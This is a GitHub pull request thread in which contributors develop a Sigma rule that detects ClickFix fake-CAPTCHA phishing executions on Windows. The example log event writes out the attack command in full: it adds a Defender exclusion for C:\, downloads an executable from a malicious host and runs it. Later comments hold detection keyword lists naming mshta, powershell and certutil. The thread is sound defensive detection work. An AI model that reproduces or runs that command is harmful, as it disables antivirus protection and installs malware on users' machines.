Adding rule for detecting recaptcha phish process executions

[montysecurity]

Summary of the Pull Request

Adding rule for detecting recaptcha phish process executions

Changelog

New: proc_creation_win_powershell_fake_captcha.yml

Example Log Event

cmd /c "powershell Add-MpPreference -ExclusionPath 'C:\' && timeout 2 && powershell Invoke-WebRequest -Uri 'http://book[.]rollingvideogames[.]com/temp/1.exe' -OutFile '%TEMP%\1.exe' && start %TEMP%\1.exe" # ✅ ''I am not a robot - reCAPTCHA Verification ID: 1212''

Reference: https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware

Fixed Issues

N/A

SigmaHQ Rule Creation Conventions

• If your PR adds new rules, please consider following and applying these conventions

[github-actions]

Welcome @montysecurity 👋

It looks like this is your first pull request on the Sigma rules repository!

Please make sure to read the SigmaHQ conventions document to make sure your contribution is adhering to best practices and has all the necessary elements in place for a successful approval.

Thanks again, and welcome to the Sigma community! 😃

[swachchhanda000]

Hi
I have observed others patterns among malware abusing this clickfix technique and adjusted @montysecurity 's rules accordingly. His rule was slightly incorrect as well because for log event given in his example, the image will be cmd.exe for parentimage explorer.exe not powershell.exe.

Thats why i added them on commandline not on image just to be safe

proc_creation_win_susp_clickfix_execution_pattern.yml

title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
    Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
    This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
    These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
    The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
    This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
    - https://github.com/JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems)
date: 2025-03-04
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
    selection_cmd_1:
        CommandLine|contains:
            - 'I am not a robot - reCAPTCHA Verification'
            - 'Verify you are human - Ray Verification ID:'
    selection_cmd_2:
        CommandLine|contains:
          - 'mshta'
          - 'powershell'
          # Add more potentially suspicious executables used for malware download/execution
    condition: all of selection_*
falsepositives:
    - Higly unlikely
level: high

cc @nasbench , @frack113

[montysecurity]

Good eye and thanks for the assist @swachchhanda000 !

[nasbench]

Hi I have observed others patterns among malware abusing this clickfix technique and adjusted @montysecurity 's rules accordingly. His rule was slightly incorrect as well because for log event given in his example, the image will be cmd.exe for parentimage explorer.exe not powershell.exe.

Thats why i added them on commandline not on image just to be safe

proc_creation_win_susp_clickfix_execution_pattern.yml

title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
    Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
    This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
    These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
    The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
    This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
    - https://github.com/JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems)
date: 2025-03-04
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
    selection_cmd_1:
        CommandLine|contains:
            - 'I am not a robot - reCAPTCHA Verification'
            - 'Verify you are human - Ray Verification ID:'
    selection_cmd_2:
        CommandLine|contains:
          - 'mshta'
          - 'powershell'
          # Add more potentially suspicious executables used for malware download/execution
    condition: all of selection_*
falsepositives:
    - Higly unlikely
level: high

cc @nasbench , @frack113

You do not need the CLI for the binaries as the captcha strings are enough.

[swachchhanda000]

@nasbench , @frack113
See this,
https://app.any.run/tasks/61fd06c8-2332-450d-b44b-091fe5094335/?utm_source=twitter&utm_medium=post&utm_campaign=fake_booking&utm_term=060325&utm_content=linktoservice

https://x.com/anyrun_app/status/1897651321462784280
I guess, We also need to add 'I'm human ID' in the commandline
or like try to think more genericly

[montysecurity]

@swachchhanda000 what about something like this? going for the more generic approach

title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
    Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
    This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
    These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
    The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
    This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
    - https://github.com/JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems)
date: 2025-03-04
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
    selection_cmd_1:
        CommandLine|contains:
            - 'robot'
            - 'captcha'
            - 'recaptcha'
            - 'human'
            - 'verify'
            - 'verification'
    selection_cmd_2:
        CommandLine|contains:
            - '#' # PowerShell Comment
    selection_cmd_3:
        CommandLine|contains:
            - 'mshta'
            - 'powershell'
            - 'certutil'
            - 'scrobj.dll'
            # Add more potentially suspicious executables used for malware download/execution
    selection_cmd_4:
        CommandLine|contains:
            - 'https://'
            - 'http://'
    condition: all of selection_*
falsepositives:
    - Higly unlikely
level: high